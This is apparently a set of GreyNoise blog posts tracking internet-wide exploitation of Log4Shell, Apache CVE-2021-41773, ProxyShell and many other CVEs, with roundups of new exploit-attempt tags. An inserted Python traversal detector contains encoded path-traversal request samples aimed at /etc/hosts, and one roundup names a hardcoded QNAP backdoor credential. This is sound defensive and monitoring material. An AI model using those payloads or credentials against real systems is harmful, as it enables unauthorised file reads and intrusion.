To get a current list of all the IP addresses opportunistically scanning the internet to vuln check or exploit CVE-2021-44228, check out this tag summary in the GreyNoise Visualizer.

“The reason this vulnerability matters is that Log4j is heavily integrated in enterprise IT and devops. There are a whole bunch of devops frameworks and a whole bunch of enterprise IT systems and vendor systems that use it. So if you pick basically any large vendor and stick Log4j in Google, you’ll find it kicking around in different products, which is going to become a problem. There’s clearly lots of systems out there that, in some way shape or form, rely on this.” – Kevin Beaumont (@GossiTheDog, via Twitter Spaces recording)

Timeline of CVE-2021-44228

On December 5th, 2021, Apache filed a JIRA issue identifying the vulnerability that would become CVE-2021-44228. The following day, December 6th, Apache released a patch providing some details on the vulnerability and crediting Chen Zhaojun of Alibaba Cloud Security Team for the discovery.

On December 9th, weaponized proof-of-concept exploits (PoCs) began to appear, leading to a rapid increase of scanning and public exploitation on December 10th.

Figure: Timeline of events leading up to GreyNoise observing CVE-2021-44228 in the wild. Source: GreyNoise Research

Between 1200 EST and 1400 EST on December 10, 2021, GreyNoise observed a 5x increase in the number of hits per sensor related to the Log4shell event.

Figure: Hourly breakdown of traffic observed by GreyNoise sensors on 2021-12-09 to 2021-12-10. Source: GreyNoise Research

Impact of CVE-2021-44228

Due to the ease of exploitation and the prevalence of Log4j, GreyNoise researchers believe that this activity will continue to increase over the next few days. A wide variety of use cases for this exploit have already begun to appear, ranging from exploiting Minecraft servers

Figure: Exploiting Minecraft servers with the Apache Log4j vulnerability. Source: https://twitter.com/twokilohertz/status/1469087293126365186

to more high-profile issues potentially affecting Apple iCloud.

Figure: Exploiting Apple iCloud with the Apache Log4j vulnerability. Source: https://twitter.com/GossiTheDog/status/1469344690336108544

The vulnerability feels similar to ShellShock, a vulnerability GreyNoise has continued to observe being exploited since it was first identified in 2014.

Indicator of Compromise (IoC) resources for security teams

GreyNoise is providing IoCs for CVE-2021-44228 Apache Log4j RCE attempts on GitHub. You can access the C2/Callback domains here and the latest IPs here. You can get the most up-to-date information via GreyNoise for Log4shell here.

Figure: GreyNoise IOCs for CVE-2021-44228 Apache Log4j RCE attempts - C2/Callback domains. Source: GreyNoise Research

CVE-2021-44228 is still new, and its impact will likely be felt for a long time due to the pervasiveness of Log4j. Multiple recommendations for patching have been made (CISA), and detections have been made available. As the landscape develops, GreyNoise will be tweeting about new information and IoCs. Follow us there for the latest information.

GreyNoise Tag Round Up | October 1 - 29

New Tags

GitLab CE RCE Attempt  [Intention: Malicious]

Apache Storm Supervisor RCE Attempt  [Intention: Malicious]

  • CVE-2021-40865
  • This IP address has been observed attempting to exploit CVE-2021-40865, a pre-auth remote code execution vulnerability in Apache Storm supervisor server.
  • Sources: Security Lab, SecLists
  • See it on GreyNoise Viz

Hikvision IP Camera RCE Attempt  [Intention: Malicious]

  • CVE-2021-36260
  • This IP address has been observed attempting to exploit CVE-2021-36260, a remote command execution vulnerability in Hikvision IP cameras and NVR firmware.
  • Sources: Watchful IP, Github (@Aiminsun)
  • See it on GreyNoise Viz

SonicWall SMA100 Factory Reset Attempt  [Intention: Malicious]

  • CVE-2021-20034
  • This IP address has been observed attempting to exploit CVE-2021-20034, an arbitrary file deletion vulnerability that allows performing a factory reset on SonicWall SMA100 devices.
  • Sources: Exploit DB, Attacker KB
  • See it on GreyNoise Viz

SonicWall SSL-VPN RCE Attempt  [Intention: Malicious]

  • This IP address has been observed attempting to exploit a remote command execution vulnerability in SonicWall SSL-VPN.
  • Sources: Darren Martyn (GitHub)
  • See it on GreyNoise Viz

Legacy Web Server RCE Attempt [Intention: Malicious]

  • CVE-2009-4487, CVE-2009-4488, CVE-2009-4489, CVE-2009-4490, CVE-2009-4491, CVE-2009-4492, CVE-2009-4493, CVE-2009-4494, CVE-2009-4495, CVE-2009-4496
  • This IP address has been observed attempting to exploit a command injection vulnerability found in the old versions of several web servers.
  • Sources: ush.it
  • See it on GreyNoise Viz

D-Link DIR-825 R1 RCE Attempt [Intention: Malicious]

  • CVE-2020-29557
  • This IP address has been observed attempting to exploit CVE-2020-29557, a remote command execution vulnerability in D-Link DIR-825 R1 devices.
  • Sources: Shaked Delarea, NIST
  • See it on GreyNoise Viz

D-Link DNS-320 RCE Attempt [Intention: Malicious]

  • CVE-2020-25506
  • This IP address has been observed attempting to exploit CVE-2020-25506, a remote command execution vulnerability in D-Link DNS-320 devices.
  • Sources: NIST, GitHub
  • See it on GreyNoise Viz

Micro Focus OBR RCE Attempt [Intention: Malicious]

  • CVE-2021-22502
  • This IP address has been observed attempting to exploit CVE-2021-22502, a remote command execution vulnerability in Micro Focus Operation Bridge Reporter software.
  • Sources: NIST, GitHub
  • See it on GreyNoise Viz

Yealink Device Management RCE Attempt [Intention: Malicious]

  • CVE-2021-27561
  • This IP address has been observed attempting to exploit CVE-2021-27561, a remote command execution vulnerability in Yealink Device Management Platform.
  • Sources: NIST, SSD Disclosure
  • See it on GreyNoise Viz

A Patchy Server: GreyNoise observes Path Traversal and Remote Code Execution in Apache HTTP Server (CVE-2021-41773)

Path Traversal and Remote Code Execution in Apache HTTP Server, CVE-2021-41773

On October 4th, 2021, Apache disclosed a path traversal vulnerability, CVE-2021-41773, that affects Apache HTTP Server version 2.4.49. The vulnerability was introduced in that version and is patched in version 2.4.50.

This path traversal vulnerability allows sensitive files outside of the expected document root to be accessed, such as configuration files and Common Gateway Interface (CGI) scripts. This allows for specially crafted requests to read arbitrary files as well as perform Remote Code Execution (RCE) on systems that have the Apache “mod_cgi” module enabled.
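A defender-side check for the traversal class described above, added here as an example and not GreyNoise code: it percent-decodes request paths before resolving dot segments, so encoded and double-encoded `..` are caught rather than only a literal `..`, and it notes when the resolved target sits under `cgi-bin`, the RCE surface when mod_cgi is enabled. The request lines are constructed.

```python
from dataclasses import dataclass
from typing import List, Tuple
from urllib.parse import unquote

# Constructed request lines in access-log style (not GreyNoise sensor data).
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.1",
    "GET /images/../css/site.css HTTP/1.1",                  # '..' that stays inside the root
    "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/hosts HTTP/1.1",   # percent-encoded dot segments
    "GET /icons/%252e%252e/%252e%252e/etc/hosts HTTP/1.1",   # double-encoded dot segments
    "GET /cgi-bin/status.cgi HTTP/1.1",
]


@dataclass
class Verdict:
    raw_path: str
    decoded_path: str
    decode_rounds: int      # >1 means the path was percent-encoded more than once
    escapes_root: bool      # the resolved path climbs above the document root
    literal_dotdot: bool    # a plain '..' was visible before any decoding
    targets_cgi: bool       # first segment is cgi-bin


def fully_decode(path: str, max_rounds: int = 5) -> Tuple[str, int]:
    """Percent-decode until the string stops changing; return (decoded, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
        rounds += 1
    return path, rounds


def escapes_root(path: str) -> bool:
    """Walk the segments and report whether '..' ever climbs above '/'.

    posixpath.normpath would silently clamp at '/', which is exactly the
    information a detector needs to keep.
    """
    depth = 0
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def assess(request_line: str) -> Verdict:
    """Classify one request line; the query string is ignored on purpose."""
    raw_path = request_line.split(" ", 2)[1].split("?", 1)[0]
    decoded, rounds = fully_decode(raw_path)
    segments = [s for s in decoded.split("/") if s]
    return Verdict(
        raw_path=raw_path,
        decoded_path=decoded,
        decode_rounds=rounds,
        escapes_root=escapes_root(decoded),
        literal_dotdot=".." in raw_path,
        targets_cgi=bool(segments) and segments[0] == "cgi-bin",
    )


def suspicious(lines: List[str]) -> List[Verdict]:
    """Only requests whose decoded path leaves the document root are returned."""
    return [v for v in (assess(line) for line in lines) if v.escapes_root]


if __name__ == "__main__":
    for v in suspicious(SAMPLE_REQUESTS):
        print(v)
```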

Figure 1: GreyNoise Timeline of CVE-2021-41773

On October 3rd, 2021, at 08:44 UTC, GreyNoise observed the first scan for this vulnerability from 36.68.53.196. This predates the mailing list announcement from Apache on October 5th as well as the release of 2.4.50 on October 4th, but comes after the patch was committed on September 29th. [View 36.68.53.196 in GreyNoise]

Figure 2: GreyNoise sensors observed scanning activity prior to vulnerability disclosure.

On October 5th, 2021, the first proof-of-concept (PoC) code, demonstrating arbitrary file read, became available. It was closely followed by a PoC demonstrating RCE.

Figure 2: Count of CVE-2021-41773 Attempts by Day

GreyNoise Tag for CVE-2021-41773

GreyNoise has released the following tag to enable monitoring of relevant activity:

As of 7-Oct-21, GreyNoise is seeing 47 unique IP addresses that have scanned for this vulnerability, 39 of which are “malicious” and 8 of which are “benign.”

Figure 3: GreyNoise Visualizer page showing all IP addresses scanning for CVE-2021-41773, data pulled on Oct. 7, 2021

* Editor’s Note: If this tag returns “No results found,” this means that GreyNoise has not observed any IP addresses scanning the internet for this CVE in the past 90 days. You can use GreyNoise to notify you if this changes by using our Alerts feature.

10/15/21: This blog has been updated with Figure 1 to depict the timeline of events.

GreyNoise Tag Round Up | September 14 - 30

New Tags

Azure OMI RCE Attempt  [Intention: Malicious]

  • CVE-2021-38647, CVE-2021-38648, CVE-2021-38645, CVE-2021-38649
  • This IP address has been observed scanning the internet for WSMan PowerShell providers without an Authorization header, a root RCE in Azure Open Management Infrastructure.
  • Sources: Wiz, Microsoft Security Response Center [1, 2, 3, 4]
  • See it on GreyNoise Viz

Azure OMI RCE Check [Intention: Unknown]

  • CVE-2021-38647, CVE-2021-38648, CVE-2021-38645, CVE-2021-38649
  • This IP address has been observed scanning the internet for WSMan PowerShell providers without an Authorization header, but has not provided a valid SOAP XML Envelope payload.
  • Sources: Wiz, Microsoft Security Response Center [1, 2, 3, 4]
  • See it on GreyNoise Viz

VMWare VCSA File Upload Attempt  [Intention: Malicious]

  • CVE-2021-22005, CVE-2021-22017
  • This IP address has been observed attempting to exploit a remote file upload vulnerability in VMWare vCenter Server Appliance.
  • Sources: VMware [1, 2], MITRE [1, 2]
  • See it on GreyNoise Viz

VMWare VCSA File Upload Check [Intention: Unknown]

  • CVE-2021-22005, CVE-2021-22017
  • This IP address has been observed checking for the presence of a remote file upload vulnerability in VMWare vCenter Server Appliance.
  • Sources: VMware [1, 2], MITRE [1, 2]
  • See it on GreyNoise Viz

LDAP Crawler [Intention: Unknown]

Veeder-Root ATGs Crawler [Intention: Unknown]

VMware vCenter File Disclosure [Intention: Malicious]

PJL Crawler [Intention: Unknown]

PowerShell Generic Shell Attempt [Intention: Malicious]

  • This IP address has been observed attempting to spawn a generic PowerShell reverse or bind shell via a web request.
  • Sources: GitHub
  • See it on GreyNoise Viz

Cisco IMC Supervisor and UCS Director Backdoor [Intention: Malicious]

  • CVE-2019-1935
  • This IP address has been observed attempting to authenticate via SSH using default credentials for Cisco IMC Supervisor and Cisco UCS Director products.
  • Sources: NIST
  • See it on GreyNoise Viz

GreyNoise Identifies Vulnerability Checks of VMWare vCenter Remote File Upload (CVE-2021-22005)

On September 21, 2021, VMware published an advisory for several vulnerabilities. This included, most notably, CVE-2021-22005, which affects its vCenter Server product. This is an arbitrary file upload vulnerability that can lead to remote code execution (RCE) via upload of a specially crafted file, and it works regardless of the configuration settings of vCenter Server.

Due to the severity of this vulnerability, VMWare published workaround instructions detailing how to manually or automatically patch the affected products. The automated patching script (available in the right-hand panel in the link above) includes logic to validate if your product is vulnerable to CVE-2021-22005, as well as confirm the patch has worked as expected.

As of September 23, 2021, there is no known publicly available proof-of-concept (PoC) code for the CVE that enables arbitrary file upload or RCE. However, GreyNoise is observing a significant number of checks for vulnerable instances of vCenter Server based on the automated patching script provided by VMware, most of them egressing via Tor.

Figure 1: Count of CVE-2021-22005 Vulnerability Checks by Day

The following tags have been released to enable monitoring of relevant activity:

Editor's Note: If either of these tags return "no results," this means that we have not observed any recent activity. You can be notified if this changes by using our Alerts feature.


GreyNoise Tag Round Up | September 2 - 13

New Tags

MongoDB Crawler  [Intention: Unknown]

Apple iOS Lockdownd Crawler [Intention: Unknown]

HTTP Request Smuggling [Intention: Malicious]

  • This IP address has been observed attempting to smuggle HTTP requests, a method commonly used to bypass load balancer or proxy security restrictions.
  • Sources: PortSwigger, JFrog
  • See it on GreyNoise Viz

Gh0st RAT Crawler  [Intention: Malicious]

  • This IP address has been observed checking for the existence of hosts infected with Gh0st trojan.
  • Sources: RSA Community, norman.no
  • See it on GreyNoise Viz

nJRAT Crawler  [Intention: Malicious]

Supervisor XML-RCE Attempt  [Intention: Malicious]

  • This IP address has been observed attempting to exploit CVE-2017-11610, a remote command execution vulnerability in Supervisor client/server.
  • Sources: NIST, Supervisor
  • See it on GreyNoise Viz

New Actor Tag

BLEXbot [Intention: Benign]

GreyNoise Tag Roundup | August 16 - September 1

New Tags

Atlassian Confluence Server OGNL Injection Attempt [Intention: Malicious]

  • CVE-2021-26084
  • This IP address has been observed attempting to exploit CVE-2021-26084, an OGNL injection vulnerability in Confluence Server and Data Center.
  • Sources: GitHub (1, 2), MITRE
  • See it on GreyNoise Viz

Atlassian Confluence Server OGNL Injection Vuln Check [Intention: Unknown]

  • CVE-2021-26084
  • This IP address has been observed checking for the existence of CVE-2021-26084, an OGNL injection vulnerability in Confluence Server and Data Center.
  • Sources: GitHub (1, 2), MITRE
  • See it on GreyNoise Viz

Oracle WebLogic RCE CVE-2021-2109 [Intention: Malicious]

Seagate BlackArmor RCE Attempt [Intention: Malicious]

ASUS GT-AC2900 Auth Bypass Attempt [Intention: Malicious]

  • CVE-2021-32030
  • This IP address has been observed attempting to exploit CVE-2021-32030, an authentication bypass in ASUS GT-AC2900 routers.
  • Sources: MITRE, Atredis
  • See it on GreyNoise Viz

Apache SkyWalking GraphQL SQL Injection  [Intention: Malicious]

  • CVE-2020-9483
  • This IP address has been observed attempting to exploit CVE-2020-9483, a SQL injection vulnerability in Apache SkyWalking via GraphQL.
  • Sources: GitHub, NVD
  • See it on GreyNoise Viz

Carries HTTP Referer [Intention: Unknown]

  • This IP address has been observed scanning the internet with an HTTP client that includes the Referer header in its requests.
  • Sources: Firefox
  • See it on GreyNoise Viz

Stores HTTP Cookies  [Intention: Unknown]

  • This IP address has been observed scanning the internet with an HTTP client that supports storing Cookies.
  • Sources: Firefox (1, 2)
  • See it on GreyNoise Viz

Follows HTTP Redirects  [Intention: Unknown]

  • This IP address has been observed scanning the internet with an HTTP client that follows redirects defined in a Location header.
  • Sources: Firefox
  • See it on GreyNoise Viz

RSYNC Crawler  [Intention: Unknown]

New Actor Tag

University of Michigan [Intention: Benign]

Tag Improvements

As part of our process, our research team continues to clean up and improve on existing tags as new information or better processes are introduced.

ADB Check [Intention: Unknown]

  • This IP address has been observed checking for the existence of the Android Debug Bridge protocol.
  • See it on GreyNoise Viz

ADB Attempt [Intention: Malicious]

  • This IP address has been observed checking for the existence of the Android Debug Bridge protocol and has requested interactivity.
  • See it on GreyNoise Viz

EDITORS NOTE: This blog post has been updated as of Sep. 2 to reflect edits to the Atlassian Confluence Server OGNL Injection tags.

GreyNoise Tag Roundup | August 2 - 16

New Tags

Tag: Exchange ProxyShell Vuln Attempt [Intention: Malicious]

Tag: Exchange ProxyShell Vuln Check [Intention: Unknown]

  • CVE-2021-34473, CVE-2021-34523, CVE-2021-31207
  • This IP address has been observed checking for the existence of the ProxyShell vulnerability in Microsoft Exchange, an activity which commonly leaks sensitive information.
  • Sources: Medium, BlackHat, y4y.space
  • See it on GreyNoise Viz

Tag: Javascript Enabled [Intention: Unknown]

  • This IP address has been observed scanning the internet with a client that supports javascript, such as a web browser controlled through automation.
  • See it on GreyNoise Viz

Tag: Aerospike RCE Attempt [Intention: Malicious]

  • CVE-2020-13151
  • This IP address has been observed attempting to exploit CVE-2020-13151, a remote command execution in Aerospike databases.
  • Sources: NIST, GitHub [1, 2]
  • See it on GreyNoise Viz

Tag: Docker API Container Creation Attempt [Intention: Malicious]

Tag: Buffalo Router RCE Check [Intention: Unknown]

  • CVE-2021-20091
  • This IP address has been observed attempting to discover Buffalo routers susceptible to remote command injection through path traversal.
  • Sources: Tenable, MITRE
  • See it on GreyNoise Viz

Tag: Buffalo Router RCE Attempt [Intention: Malicious]

  • CVE-2021-20091
  • This IP address has been observed attempting to exploit Buffalo routers susceptible to remote command injection through path traversal.
  • Sources: Tenable, MITRE
  • See it on GreyNoise Viz

Tag: FirebirdSQL Crawler [Intention: Unknown]

Tag: Ruijie EG Command Injection Attempt [Intention: Malicious]

  • This IP address has been observed attempting command injection on Ruijie network devices with Easy Gateway support.
  • Sources: peiqi.tech
  • See it on GreyNoise Viz

Recent Actor Tag

  • Cortex® Xpanse™ [Intention: Benign]

Tag Improvements

As part of our process, our research team continues to clean up and improve on existing tags as new information or better processes are introduced.

Tag: X Server Connection Attempt [Intention: Malicious]

  • This IP address has been observed scanning the Internet for X11 servers with access control disabled, which allows for unauthenticated connections.
  • See it on GreyNoise Viz

Tag: ADB Worm [Intention: Malicious]

Removed Tags

GreyNoise Identifies Vulnerability Checks of Exchange ProxyShell (CVE-2021-34473)

During BlackHat 2021, security researcher Orange Tsai demonstrated a proof-of-concept exploit for Microsoft Exchange vulnerabilities, including a Pre-auth Path Confusion leading to Access-Control List (ACL) bypass (tracked as CVE-2021-34473, also called ProxyShell). Since Tsai’s talk, multiple researchers have published write-ups about the vulnerabilities [1, 2]. GreyNoise had not observed any mass scanning activity until Aug. 9, and has seen a significant uptick in scanning as of Thursday, Aug. 12. GreyNoise has created two tags to track activity related to these vulnerabilities.

Figure 1: ProxyShell activity as seen by GreyNoise over time

Exchange ProxyShell Vuln Check: The vulnerability check for CVE-2021-34473 has several public variations. These include checking for access to /mapi/nspi which results in exposure of potentially sensitive information such as Version, User, UPN, SID, and Organization. Out of caution, GreyNoise tags this as malicious intent despite being a Vuln Check. [View In GreyNoise]

Exchange ProxyShell Vuln Attempt: Active attempts that leverage and chain the Pre-Auth Path Confusion for further exploitation through Elevation of Privilege on Exchange PowerShell Backend (CVE-2021-34523) or Post-auth Arbitrary-File-Write leading to remote code execution (CVE-2021-31207) are included in this tag. [View In GreyNoise]

Editor's Note: If either of these tags, or any tags for that matter, return "no results," this means that we have not observed any recent activity. You can be notified if this changes by using our Alerts feature.

GreyNoise Tag Roundup | July 19 - August 2

New Tags

CVE-2009-0545, CVE-2019-12725, CVE-2020-29390

Tag: Zeroshell RCE Attempt [Intention: Malicious]

  • This IP address has been observed attempting to exploit a remote command execution vulnerability in Zeroshell.
  • Sources: NIST [1, 2, 3]
  • See it on GreyNoise Viz

Tag: Cisco Smart Install RCE Attempt [Intention: Malicious]

CVE-2021-35464

Tag: ForgeRock OpenAM Pre-Auth RCE Vuln Check [Intention: Unknown]

  • This IP address has been observed checking for the existence of CVE-2021-35464, a path traversal vulnerability in ForgeRock OpenAM which can lead to RCE.
  • Sources: PortSwigger, NIST
  • See it on GreyNoise Viz

CVE-2021-35464

Tag: ForgeRock OpenAM Pre-Auth RCE Attempt [Intention: Malicious]

  • This IP address has been observed attempting to exploit CVE-2021-35464, a path traversal vulnerability in ForgeRock OpenAM that can lead to RCE.
  • Sources: PortSwigger, NIST
  • See it on GreyNoise Viz

CVE-2021-33544 to CVE-2021-33554 (11 CVEs)

Tag: UDP Technology IP Camera Attempt [Intention: Malicious]

CVE-2021-33544, CVE-2021-33548, CVE-2021-33550 to CVE-2021-33554

Tag: UDP Technology IP Camera Check [Intention: Unknown]

CVE-2017-12149

Tag: Jboss Application Server RCE Attempt [Intention: Malicious]

  • This IP address has been observed attempting to exploit CVE-2017-12149, a remote code execution vulnerability in JBoss Application Server.
  • Sources: NIST, GitHub
  • See it on GreyNoise Viz

CVE-2021-30497

Tag: Ivanti Avalanche Path Traversal [Intention: Malicious]

  • This IP address has been observed attempting to use CVE-2021-30497, a path traversal vulnerability in Ivanti Avalanche that could lead to arbitrary file retrieval.
  • Sources:  Ivanti, SSD Disclosure
  • See it on GreyNoise Viz

Tag: Double URL Encoding [Intention: Malicious]

  • This IP address has been observed requesting double encoded URLs, a method commonly used for bypassing defensive rules and directory traversal.
  • Sources:  OWASP, Imperva
  • See it on GreyNoise Viz

Tag: Apache OFBiz Deserialization RCE [Intention: Malicious]

  • This IP address has been observed attempting to exploit CVE-2021-29200, a deserialization vulnerability in Apache OFBiz 17.12.07 and earlier that can lead to unauthenticated RCE.
  • Sources:  NIST, xz.aliyun.com
  • See it on GreyNoise Viz

Removed Tags

These tags have been removed because they no longer exist, scan, and/or can no longer be accurately identified.

  • RDP Bruteforcer
  • Windows RDP Cookie Hijacker
  • RDP Scanner

Multiple RDP tags have been deprecated in favor of RDP Crawler, which more accurately accounts for much of the behavior we see. We are currently working to create more accurate and narrowly scoped tags for RDP scanning and exploitation.

The RDP Bruteforcer tag was created around the same time as BlueKeep and aggressively assigned `malicious` intent to basic RDP connection attempts. After re-evaluating this, we feel this was incorrect and have taken actions to improve our RDP tags in general.

Tag Improvements

As part of our process, our research team continues to clean up and improve on existing tags as new information or better processes are introduced.

Tag: Cisco Smart Install Endpoint Scanner [Intention: Unknown]

Tag: Linksys E-Series TheMoon Worm [Intention: Malicious]

Integrations

Anomali: Now supports RIOT and the Community API.

GreyNoise Tag Roundup | June 21 - July 16

New Tags

CVE-2020-36289

Tag: Jira User Enumeration Attempt [Intention: Unknown]

CVE-2021-1497, CVE-2021-1498

Tag: Cisco HyperFlex HX RCE Attempt [Intention: Malicious]

CVE-2021-1497, CVE-2021-1498

Tag: Cisco HyperFlex HX RCE Vuln Check [Intention: Unknown]

CVE-2020-35846, CVE-2020-35847, CVE-2020-35848

Cockpit CMS Command Injection [Intention: Malicious]

Recent Actor Tag

  • CISA [Intention: Benign]

Removed Tags

These tags have been removed because they no longer exist, scan, and/or can no longer be accurately identified.

  • ZeroShell RCE CVE-2009-0545

GreyNoise Tag Round Up | June 7 - 18

New Tags

CVE-2020-25494

Tag: SCO OpenServer RCE Attempt [Intention: Malicious]

CVE-2021-22911

Tag: Rocket.Chat server RCE Attempt [Intention: Malicious]

  • This IP address has been observed attempting to exploit CVE-2021-22911, a remote command execution vulnerability in Rocket.Chat server.
  • Sources: NIST, @CsEnox (GitHub)
  • See it on GreyNoise Viz

Tag: Vesta Control Panel RCE Attempt [Intention: Malicious]

CVE-2021-27144/46 | CVE-2021-27148/55 | CVE-2021-27158/59 | CVE-2021-27162/66 | CVE-2021-27168/69 | CVE-2021-27172

Tag: FiberHome Telnet Backdoor [Intention: Malicious]

  • This IP address has been observed attempting to authenticate via telnet using one of several known backdoor accounts in FiberHome routers.
  • Sources: Pierre Kim
  • See it on GreyNoise Viz

Tag: LokiBot C2 Crawler [Intention: Unknown]

  • This IP address has been observed crawling the Internet and attempting to discover LokiBot C2 nodes.
  • Sources: CISA
  • See it on GreyNoise Viz

Tag: Aerospike Crawler [Intention: Unknown]

Recent Actor Tag

  • ESET  [Intention: Benign]

Tag Improvements

As part of our process, our research team continues to clean up and improve on existing tags as new information or better processes are introduced.

Tag: Tomcat Manager Scanner [Intention: Unknown]

GreyNoise Tag Round Up | May 24 - June 4

New Tags

CVE-2021-21985

Tag: Vmware vSphere Client RCE Attempt [Intention: Malicious]

Tag: VMware vSphere Client RCE Vuln Check [Intention: Unknown]

CVE-2021-28799

Tag: VMware ESXi OpenSLP RCE Attempt [Intention: Malicious]

Tag Improvements

As part of our process, our research team continues to clean up and improve on existing tags as new information or better processes are introduced.

Tag: Elasticsearch RCE Attempt [Intention: Malicious]

Recent Actor Tag

Removed Tags

These tags have been removed because they no longer exist, scan, and/or can no longer be accurately identified.

  • Swedish Defense Research Agency (FOI)
  • Elasticsearch Worm

GreyNoise Tag Round Up | May 10 - 21

New Tags

CVE-2021-26912 | CVE-2021-26913 | CVE-2021-26914 | CVE-2021-26915

Tag: NetMotion Mobility Server RCE Attempt [Intention: Malicious]

  • This IP address has been observed attempting to exploit a deserialization vulnerability in NetMotion Mobility Server that can lead to remote code execution.
  • Sources: NIST [1, 2, 3, 4], SSD Disclosure
  • See it on GreyNoise Viz

CVE-2021-21402

Tag: Jellyfin File Disclosure [Intention: Malicious]

CVE-2021-28799

Tag: QNAP walter SSH Backdoor Attempt [Intention: Malicious]

  • This IP address has been observed attempting to connect using the username and password 'walter,' which are hardcoded backdoor SSH credentials that exist in some QNAP devices.
  • Source: QNAP, QNAP Forum
  • See it on GreyNoise Viz

CVE-2021-30461

Tag: VoIPmonitor Unauthenticated RCE Attempt  [Intention: Malicious]

Tag Improvements

As part of our process, our research team continues to clean up and improve on existing tags as new information or better processes are introduced.

Tag: RDP Bruteforcer [Intention: Malicious]

  • This IP address has been observed attempting to brute-force Microsoft Remote Desktop credentials.
  • Source: Microsoft [1, 2]
  • See it on GreyNoise Viz

Recent Integrations

Rapid7 InsightConnect: Supports Enterprise API and Community API access.

CORTEX XSOAR: Supports Enterprise API and Community API access.
